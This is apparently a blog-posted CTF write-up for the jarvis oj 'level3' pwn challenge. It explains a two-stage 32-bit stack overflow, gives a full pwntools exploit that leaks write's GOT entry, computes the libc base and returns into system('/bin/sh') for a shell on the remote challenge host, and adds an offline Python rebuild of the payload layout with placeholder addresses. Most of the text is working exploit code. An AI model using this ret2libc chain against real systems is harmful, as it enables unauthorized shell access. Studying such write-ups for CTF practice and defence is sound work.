jarvis oj PWN - level3

Approach:
1. Use write() to leak the GOT entry of write (its resolved libc address), then compute libc's load offset from the known libc build to locate system and the "/bin/sh" string.
2. Overflow past the saved ebp and overwrite the return address so execution returns into vulnerable_function and the overflow can be triggered a second time.
3. On the second overflow, overwrite the return address again to call system("/bin/sh").

Key stack layout for the leak call: write@plt, return address (vulnerable_function), 1 (fd = stdout), write@got (buffer to print), 4 (number of bytes)

from pwn import *

context(arch='i386', os='linux')
# context.log_level = 'debug'

is_debug = False
# is_debug = True

io = remote("pwn2.jarvisoj.com", 9879)
# io = process('./level3')

if is_debug:
    gdb.attach(io, '''
    b *0x08048483
    ''')

e = ELF('level3')
vuln_addr = e.symbols['vulnerable_function']   # return here after the leak so we can overflow a second time
write_plt = e.plt['write']
write_got = e.got['write']

# libc build running on the remote side; for a local run substitute the local libc
# libc = ELF('/lib/i386-linux-gnu/libc.so.6')
libc = ELF('libc-2.19.so')
libc_write = libc.symbols['write']

# buf starts at ebp-0x88: 0x88 bytes fill the buffer, 4 more overwrite the saved ebp,
# so the next dword lands on the saved return address
junk = b'a' * (0x88 + 4)

# stage 1: return into write@plt with the frame write() expects:
#   [return address -> vulnerable_function][fd = 1][buf = write@got][count = 4]
# write() prints the 4-byte libc address of write, then we get another overflow
payload1 = flat(junk, write_plt, vuln_addr, 1, write_got, 4)
r = io.recvline()          # "Input:" prompt
print('recv is ', r)
io.sendline(payload1)
leaked = io.recvn(4)       # exactly the 4 bytes written from the GOT; the next prompt follows them
write_addr = u32(leaked)
libc_base = write_addr - libc_write
# libc is page-aligned, so the low 12 bits of the leak must match the symbol in our libc file;
# if they differ we are computing with the wrong libc build
assert (write_addr & 0xfff) == (libc_write & 0xfff), 'leak does not match this libc build'
log.info(f'write@libc = {write_addr:#x}, libc base = {libc_base:#x}')

# stage 2: ret2libc system("/bin/sh"); the dword after system is its (unused) return address
system_addr = libc_base + libc.symbols['system']
binsh_addr = libc_base + next(libc.search(b'/bin/sh'))
payload2 = flat(junk, system_addr, 0xdeadbeef, binsh_addr)
io.sendline(payload2)
io.interactive()
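To check the fake-frame layout and the libc-base arithmetic without a network connection, here is an added stand-alone example. It is not part of the original post and does not use pwntools; the only value taken from the writeup is the 0x88 distance from buf to the saved ebp. The addresses used in the dry run at the bottom are constructed placeholders, not the real level3 or libc-2.19.so values, which in the live exploit come from ELF('level3') and ELF('libc-2.19.so'). It also adds the check a practitioner wants before trusting the leak: the low 12 bits of the leaked pointer must match the symbol's offset in the libc file, otherwise the wrong libc build was chosen.

```python
import struct

# Frame layout of vulnerable_function in level3, as used by the script above:
# buf starts 0x88 bytes below the saved ebp, the saved ebp is the next 4 bytes,
# and the saved return address follows. Everything written past JUNK lands on
# the return address and the stack slots above it.
BUF_TO_EBP = 0x88
JUNK = b"a" * (BUF_TO_EBP + 4)


def p32(value):
    return struct.pack("<I", value & 0xFFFFFFFF)


def u32(data):
    return struct.unpack("<I", data[:4])[0]


def leak_payload(write_plt, ret_addr, write_got, nbytes=4):
    """Stage 1: return into write@plt.

    When write@plt starts executing, the stack must look like a normal cdecl
    call frame: [return address][arg1][arg2][arg3]. We build
        write(1, write_got, 4)
    so the program prints the resolved libc address stored in write's GOT
    entry, then "returns" to ret_addr (vulnerable_function) for a second overflow.
    """
    return JUNK + p32(write_plt) + p32(ret_addr) + p32(1) + p32(write_got) + p32(nbytes)


def parse_leak(data):
    """Only the first 4 bytes are the leak; the re-entered function prints its
    prompt right after, so a plain recv() may hand back more than 4 bytes."""
    return u32(data[:4])


def leak_is_consistent(leaked_addr, libc_symbol_offset):
    """Sanity check before trusting the leak.

    libc is mapped at a page-aligned base, so the low 12 bits of the leaked
    pointer must equal the low 12 bits of the symbol's offset in the libc file
    we compute with. A mismatch means a different libc build is running on the
    target and every derived address (system, "/bin/sh") would be wrong.
    """
    return (leaked_addr & 0xFFF) == (libc_symbol_offset & 0xFFF)


def libc_base_from_leak(leaked_addr, libc_symbol_offset):
    if not leak_is_consistent(leaked_addr, libc_symbol_offset):
        raise ValueError("leaked address does not match the chosen libc build")
    return leaked_addr - libc_symbol_offset


def system_payload(system_addr, binsh_addr, fake_ret=0xDEADBEEF):
    """Stage 2: return into system("/bin/sh").

    Frame as seen by system: [fake return address][pointer to "/bin/sh"].
    fake_ret is where system would return after the shell exits; any value works.
    """
    return JUNK + p32(system_addr) + p32(fake_ret) + p32(binsh_addr)


def build_stage2(leaked_bytes, libc_write_off, libc_system_off, libc_binsh_off):
    """Turn the raw bytes read after stage 1 into the stage-2 payload."""
    base = libc_base_from_leak(parse_leak(leaked_bytes), libc_write_off)
    return system_payload(base + libc_system_off, base + libc_binsh_off)


if __name__ == "__main__":
    # Constructed placeholder values for a dry run; NOT the real level3 or
    # libc-2.19.so addresses.
    write_plt, vuln_addr, write_got = 0x08048340, 0x0804844B, 0x0804A018
    libc_write_off, libc_system_off, libc_binsh_off = 0x000D43C0, 0x00040310, 0x0016084C
    fake_libc_base = 0xF7E00000  # pretend this is where the target mapped libc

    stage1 = leak_payload(write_plt, vuln_addr, write_got)
    # What the target would send back: the 4 leaked bytes followed by its prompt.
    leaked = p32(fake_libc_base + libc_write_off) + b"Input:\n"
    stage2 = build_stage2(leaked, libc_write_off, libc_system_off, libc_binsh_off)
    print(f"stage1 {len(stage1)} bytes, stage2 {len(stage2)} bytes")
    print(f"libc base {libc_base_from_leak(parse_leak(leaked), libc_write_off):#x}")
```

The layout functions are deliberately separate from I/O so the offsets can be verified locally (for example against a gdb session) before touching the remote service; if the low-12-bit check fails, fix the libc file rather than the payload.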
posted @ 2021-08-02 13:39  wgf4242